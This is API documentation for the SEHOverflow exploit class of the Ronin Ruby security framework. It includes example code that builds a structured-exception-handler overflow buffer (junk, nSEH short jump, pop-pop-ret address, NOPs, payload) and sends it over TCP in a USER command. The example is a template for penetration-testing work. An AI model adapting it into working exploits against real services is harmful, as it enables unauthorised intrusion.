Class: Ronin::Exploits::SEHOverflow

Inherits:
MemoryCorruption show all
Includes:
Mixins::SEH
Defined in:
lib/ronin/exploits/seh_overflow.rb

Overview

Represents a Structured Exception Handler (SEH) overflow.

Example

require 'ronin/exploits/seh_overflow'
require 'ronin/exploits/mixins/remote_tcp'

module Ronin
  module Exploits
    class MyExploit < SEHOverflow

      register 'my_exploit'

      include Mixins::RemoteTCP

      def build
        nseh = 0x06eb9090 # short jump 6 bytes
        seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

        @buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)
      end

      def launch
        tcp_send "USER #{@buffer}"
      end

    end
  end
end

If you want more control over how the buffer is constructed:

def build
  nseh = 0x06eb9090 # short jump 6 bytes
  seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

  @buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload
end

Since:

  • 1.0.0

Constant Summary

Constants included from Mixins::NOPS

Mixins::NOPS::NOPS

Class Method Summary collapse

Methods included from Mixins::SEH

#seh_buffer_overflow, #seh_record

Methods included from Mixins::NOPS

#nop, #nops, #perform_validate

Methods included from Mixins::Binary

#pack, #perform_validate, #platform

Methods included from Mixins::Text

#junk

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from Exploit

#NotVulnerable, #Unknown, #Vulnerable, advisories, advisory, #build, #cleanup, disclosed?, disclosure_date, exploit, #exploit, #fail, #initialize, #launch, #perform_build, #perform_cleanup, #perform_launch, #perform_test, #perform_validate, quality, register, release_date, released?, software, software_versions, #test, #validate

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Class Method Details

.exploit_typeSymbol

This method is part of a private API. You should avoid using this method if possible, as it may be removed or be changed in the future.

Note:

This is used internally to map an exploit class to a printable type.

Returns the type or kind of exploit.

Returns:

  • (Symbol)

Since:

  • 1.0.0



85
86
87
# File 'lib/ronin/exploits/seh_overflow.rb', line 85

def self.exploit_type
  :seh_overflow
end